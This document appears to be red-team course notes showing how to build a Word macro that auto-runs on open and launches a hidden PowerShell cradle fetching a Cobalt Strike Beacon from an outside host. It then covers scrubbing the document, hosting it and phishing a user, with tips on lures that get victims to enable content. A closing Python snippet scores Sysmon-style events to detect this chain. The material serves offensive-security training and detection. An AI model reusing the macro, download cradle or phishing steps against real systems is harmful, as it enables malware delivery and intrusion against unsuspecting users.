
5. Visual Basic for Applications (VBA) Macros

#RTOv2 #RTO-Initial-Compromise


VBA is an implementation of Visual Basic that is widely used with Microsoft Office apps - often
used to enhance functionality in Word and Excel for data processing. The prevalence of macros in
the commercial world is a double-edged sword when it comes to leveraging macros for malicious
purposes.
On one hand, the presence of a document with embedded macros is not necessarily suspicious;
but because they are used maliciously by threat actors, they are also given more scrutiny both
from technical products and in security awareness training.
You can create a macro in a Word document by going to View --> Macros --> Create. Change the
"Macros in" field from "All active templates and documents" to "Document 1".
Give the macro a name and click Create. To force the macro to trigger automatically when the
document is opened, use the name AutoOpen:

Sub AutoOpen()
    ' Word runs a Sub named AutoOpen automatically when the document is opened
    Dim Shell As Object
    ' WScript.Shell exposes a Run method that launches an OS command
    Set Shell = CreateObject("wscript.shell")
    Shell.Run "notepad"
End Sub

"wscript.shell" is the Shell object of the Windows Script Host, which is designed for automation.
Its Run method provides the ability to execute OS commands. To test the above code, use the
play/pause/stop buttons:
Next, we need to replace notepad with a Beacon payload. The easiest to leverage is the PowerShell
payload. In CS, go to Attacks --> Scripted Web Delivery (S) and generate a 64-bit PowerShell
payload for your HTTP listener. The URI path can be anything:

This generates a PowerShell payload and hosts it on the team server so it can be downloaded over
HTTP and executed in memory. After clicking Launch, CS will generate the PowerShell one-liner
that does just that:
Copy this into the macro in place of notepad. Because VBA string literals are delimited by
double quotes, the double quotes around the IEX command must be escaped by doubling them:

Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""

To prepare the document for delivery, go to File --> Info --> Inspect Document which brings up
the Document Inspector. Click Inspect and then Remove All next to Document Properties and
Personal Information - this prevents the username on your system being embedded into the
document.

Next, go to File --> Save As and save it to C:\Payloads. Name it anything but change the format
from .docx to Word 97-2003 (.doc).

This is because macros cannot be saved inside a .docx, and there is a stigma around the
macro-enabled .docm extension. The legacy extension works best.

We then want to upload this file to the team server as well. Go to Site Management --> Host File
and select your document:
Even though the WYSIWYG text editor in OWA supports HTML, it is not very good for composing
rich HTML-based emails. It offers little beyond basic formatting options, but there is a somewhat
hacky workaround: use a pre-made HTML template.
For example, here are some HTML templates based around Office 365 (a copy can also be found
in C:\Tools\PhishingTemplates).
Open one of them, e.g. Word.html in Edge or another browser. Amazingly, what you can do is
CTRL+A and CTRL+C to copy the content, and then CTRL+V to paste it directly into the OWA text
editor. All the text and image formatting should be preserved:
Once edited and the hyperlink is placed (http://nickelviper.com/ProductReport.doc), we can email
it to Bob Farmer.
Next, log into Workstation 2 as Bob, launch Outlook and the email will arrive:

Clicking the link will open Edge and automatically download the document. Because the file is
being downloaded via a browser, it will carry the Mark of the Web (MOTW). So, when opened, it will
first be in Protected View:
The user must first click Enable Editing and then Enable Content to execute the macro. If you
attach the document directly to the email, it will not have MOTW and therefore will not open in
Protected View:

Many real-life samples try to entice the user to click this button, usually saying something
along the lines of "Security Product XYZ has scanned the content and deemed it to be safe. To
reveal the content, click Enable Content."
Once clicked, a PowerShell window will open briefly and then vanish. A new beacon will appear in
CS:
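From the defender's side, the chain this macro produces (WINWORD.EXE spawning powershell.exe with a hidden-window download cradle) is exactly what endpoint telemetry rules key on. The Python below is an added example, not part of the course notes; it scores constructed Sysmon-style process-creation events, and the field names (ParentImage, Image, CommandLine), paths and sample command lines are assumptions modelled on Sysmon Event ID 1.

```python
import re

# Constructed Sysmon-style (Event ID 1) process-creation events; not real telemetry.
# Field names follow Sysmon's ParentImage / Image / CommandLine (assumed layout).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX ((new-object "
                    "net.webclient).downloadstring('http://nickelviper.com/a'))\""},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Traits of the download cradle used in the macro: no profile, hidden window,
# Invoke-Expression over a string fetched with WebClient.DownloadString.
CRADLE_RE = re.compile(
    r"(?i)(-nop\b|-w(?:indowstyle)?\s+hidden|\biex\b|invoke-expression|"
    r"downloadstring|net\.webclient)")


def basename(path):
    """Lower-cased file name of a Windows path (good enough for telemetry)."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (severity, reasons): 0 benign, 1 Office spawned a script host,
    2 Office spawned a script host with download-cradle indicators."""
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return 0, []
    reasons = [f"{parent} spawned {child}"]
    hits = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(ev["CommandLine"])})
    if not hits:
        return 1, reasons
    reasons.append("download-cradle indicators: " + ", ".join(hits))
    return 2, reasons


def triage(events):
    """Index, severity and reasons for every event worth an analyst's attention."""
    return [(i, sev, why) for i, ev in enumerate(events)
            for sev, why in [score_event(ev)] if sev > 0]
```

Severity 1 alone (an Office parent spawning cmd.exe or powershell.exe) is already rare on a workstation and worth an alert; the cradle indicators raise it to a confirmed-malicious tier.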
